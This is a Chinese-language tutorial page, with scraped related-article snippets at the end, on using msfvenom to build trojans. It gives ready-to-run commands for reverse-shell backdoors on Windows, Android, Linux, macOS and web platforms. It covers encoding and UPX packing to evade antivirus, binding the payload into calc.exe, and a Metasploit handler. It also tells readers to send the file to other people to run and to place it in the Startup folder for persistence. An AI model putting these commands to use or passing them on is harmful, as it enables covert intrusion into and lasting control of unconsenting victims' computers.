msfvenom生成muma
简介
msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。
参数
–p (- -payload-options):添加载荷payload。载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT,就可以生成对应语言,对应平台的后门。
· –l:查看所有payload encoder nops。
· –f :输出文件格式。
· –e:编码免杀。
· –a:选择架构平台 x86 | x64 | x86_64
· –o:文件输出
· –s:生成payload的最大长度,就是文件大小。
· –b:避免使用的字符 例如:不使用 ‘\0f’。
· –i:编码次数。
· –c:添加自己的shellcode
· –x | -k:捆绑
生成exe木马
#lhost是我们的主机ip,lport是我们主机的用于监听的端口
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.129 lport=8888 -f exe -o test.exe
#编码3次
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.129 lport=8888 -i 3 -e x86/shikata_ga_nai -f exe -o test.exe
#编码10次、捆绑正常的32位calc.exe,生成32位的test.exe文件
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp -e x86/shikata_ga_nai -i 10 lhost=192.168.31.129 lport=8888 -x calc.exe -f exe -o test.exe
利用 upx 加壳
upx的功能有两种描述。一种叫做给程序加壳,另一种叫压缩程序。其实这两种表述都是正确的,只是从不同的角度对upx的描述。upx的工作原理其实是这样的:首先将程序压缩。所谓的压缩包括两方面,一方面在程序的开头或者其他合适的地方插入一段代码,另一方面是将程序的其他地方做压缩。压缩也可以叫做加密,因为压缩后的程序比较难看懂,主要是和原来的代码有很大的不同。最大的表现也就是他的主要作用就是程序本身变小了。变小之后的程序在传输方面有很大的优势。其次就是在程序执行时,实时的对程序解压缩。解压缩功能是在第一步时插入的代码完成的功能。联起来 就是:upx可以完成代码的压缩和实时解压执行。且不会影响程序的执行效率。upx和普通的压缩,解压不同点就算在于upx是实时解压缩的。
upx -9 test.exe -k -o test1.exe
生成其他格式木马:
安卓app:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.129 LPORT=8888 -o ~/Desktop/test2.apk
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.31.129 LPORT=8888 -f elf > shell.elf
Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.31.129 LPORT=8888 -f macho > shell.macho
PHP:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.20.27 LPORT=4444 -f raw -o test.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.129 LPORT=8888 -f asp > shell.asp
ASPX:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.129 LPORT=8888 -f aspx > shell.aspx
JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.31.129 LPORT=8888 -f raw > shell.jsp
Bash:
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.31.129 LPORT=8888 -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.31.129 LPORT=8888 -f raw > shell.pl
Python
msfvenom -p python/meterpreter/reverser_tcp LHOST=192.168.31.129 LPORT=8888 -f raw > shell.py
#使用exploit/multi/handler监听从肉鸡发来的数据
msf > use exploit/multi/handler
#设置payload,不同的木马设置不同的payload
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
#主机ip
msf exploit(handler) > set lhost 192.168.31.129
#主机端口
msf exploit(handler) > set lport 8888
msf exploit(handler) > exploit
然后利用任何一种方式发送给其他人,让其在其他主机上运行,这边就会接收到反弹过来的session。
输入:sessions -l 可以查看到得到的shell,使用 sessions -i 1 可以进入指定的shell
对于这个木马,如果在获取到某主机的shell后,想要在目标主机建立持续性的后门,可以将该木马放到目标主机的开机启动项中,只要该主机启动后,就可以连接到该主机了。
C:\Users\$username$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
msfvenom生成muma相关推荐
- msfvenom生成木马和内网穿透
msfvenom命令行选项如下: 英文原版 中文版: Options: -p, --payload <payload> 指定需要使用的payload(攻击荷载).如果需要使用自定义的pay ...
- msfvenom生成木马的简单利用
msfvenom生成木马的简单利用 1.简介 本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win10运行木马程序,实现控制靶机win10. 2.实 ...
- 利用msfvenom生成后门木马
msfvenom工具介绍 msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload an ...
- msfvenom生成木马利用
一开始想着把自己的物理主机当作靶机来执行木马,奈何发现不能从kali拖拽文件,所以先处理了下Tools的问题. 在安装Tools的时候提示CD-ROM门锁定,如果有和我一样问题的朋友可以按照我的方法来 ...
- msfvenom生成木马攻击-Windows10实现自己黑自己
简介: 昨天看赛题的时候,发现了一个生成"木马",学一下,来做个笔记. 没有想到msf竟然有一个,可以生成木马的工具,msfvenom. 本文用 # 作为注释. 测试环境: 攻击机 ...
- 使用msfvenom生成木马用于监听别人的操作
ss msfvenom Options: -p, --payload < payload> 指定需要使用的payload(攻击荷载).如果需要使用自定义的payload,请使用& ...
- msfvenom生成远控木马
1.生成病毒 在终端输入msfvenom -p windows/x64/meterpreter/reverse_tcp lhost =192.168.116.132 lport =12345 -f e ...
- 渗透测试Metasploit框架体验(3. MsfVenom生成后门木马)
MsfVenom 首先msf就是Metaaploit,venom就是病毒.msfvenom是msfpayload和msfencode的组合.将这两个工具集成在一个框架实例中.进一步来说,msfveno ...
- 利用msfvenom生成木马文件反弹shell
目录 1.安装靶机和攻击机 2.利用生成木马文件 3.msf里面开启监听 4.攻击成功且利用 5.meterpreter简单系统命令 1.安装靶机和攻击机 首先自己是在虚拟机完成的 靶场镜像地址MSD ...
- 【木马生成工具】Msfvenom介绍及利用
Msfvenom介绍及利用 简介 msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayloa ...
最新文章
- Kubernetes的HTTPS和证书问题,汇总
- 本地Git连接服务器git不用每次输入用户名和密码的方法
- smartform四联纸跳页问题
- 计算机网络第三章-数据链路层
- Oracle内存结构详解(三)--管理Oracle Share Pool
- P6800-[模板]Chirp Z-Transform【NTT】
- docker run命令_CVE-2019-14271:Docker cp命令漏洞分析
- 数据库的恢复 mysql
- 我的第一个项目----Java图书管理系统
- 警惕 | 警惕,mybatis的size()方法竟然有坑!
- 计算机应用无法打开,双击磁盘无法打开?_计算机应用_邹志强个人网站—(www.zouzhiqiang.com)...
- Huffuman树(java)
- java sublist_java中的subList
- Atitit 四种自动机 fsm pda 目录 1. 自动机可分为有限自动机、后进先出自动机、线性有界自动机、图灵机等几种。它们对语言的识别能力各不相同。	2 1.1. 抽象自动机的理论。	2 1.
- filp/whoops
- html实现安卓手机重启,这12行代码分分钟让你电脑崩溃手机重启
- Word2Vec之Skip-Gram与CBOW模型
- nbu6.5 linux安装,Veritas.Netbackup 6.0 for Linux RedHat AS5.3安装问题
- 夕阳无限好 只是近黄昏
- R语言-多元统计学分析课程报告
热门文章
- JS中的window对象和document对象是什么?有什么区别?
- Cassandra启动过程详解【原创】
- 故障分析 | OceanBase Proxy 无法连接 OBserver 集群
- 一分钟解决 The server selected protocol version TLS10 is not accepted 问题
- 页面提示以及页面刷新
- wps将批量数字转换成条形码_WPS怎么批量制作条码.
- Android如何关闭硬件加速
- GAMMA初学笔记二
- matlab两个力的合成与分解,[转帖]小波图像分解与合成(例子) - Matlab讨论区 - 振动论坛 动力学,噪声 -......
- linux系统发送短信,Linux系统的短信收发怎么实现?